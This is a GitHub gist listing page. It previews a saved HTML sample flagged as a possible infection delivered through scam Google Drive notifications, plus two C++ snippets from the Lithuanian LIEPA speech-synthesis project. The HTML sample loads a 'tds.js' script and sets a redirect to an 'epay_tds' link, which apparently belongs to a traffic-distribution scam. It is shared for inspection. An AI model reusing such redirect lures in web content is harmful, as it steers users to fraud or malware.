Skip to content

Instantly share code, notes, and snippets.

@kamiccolo
kamiccolo / 6641.html
Last active August 4, 2021 19:22
Possible infection, being delivered with scammy Russian messages through Google drive notifications.
<script src="tds.js"></script>
<script> var redirect = true; </script>
<a href="/1y8m" class="epay_tds">
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://creativecommons.org/ns#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
width="297mm"
version="1.1"
height="210mm"
@kamiccolo
kamiccolo / Kircdb_full.cpp
Created October 7, 2016 17:35
Full Kircdb from the LIEPA project.
///////////////////////////////////////////////////////////////////////////////////////////////////
//
// Projektas LIEPA (https://liepa.raðtija.lt)
// Sintezatoriaus komponentas transcrLUSS.dll
// Failas KircDB.cpp
// Autorius dr. Pijus Kasparaitis (pkasparaitis@yahoo.com)
// 2015 08 11
//
///////////////////////////////////////////////////////////////////////////////////////////////////
#include "stdafx.h"
@kamiccolo
kamiccolo / Kircdb.cpp
Created October 7, 2016 17:31
Example from LIEPA project.
//---------------------------------------------------------------------------------------
int Kirciuoti(char *Zodis, char *SkPb, variantas *Variant)
{
char AtvZod[ZODIL1];
char ZodK[ZODIL1];
int ilg, i, j, k, l, m, kg, kn;
int kpg, kpgn, varsk=0, rs, mini, maxi;
int KircS, Priegaid, PriesIlgis, Skiemen, Tarptaut;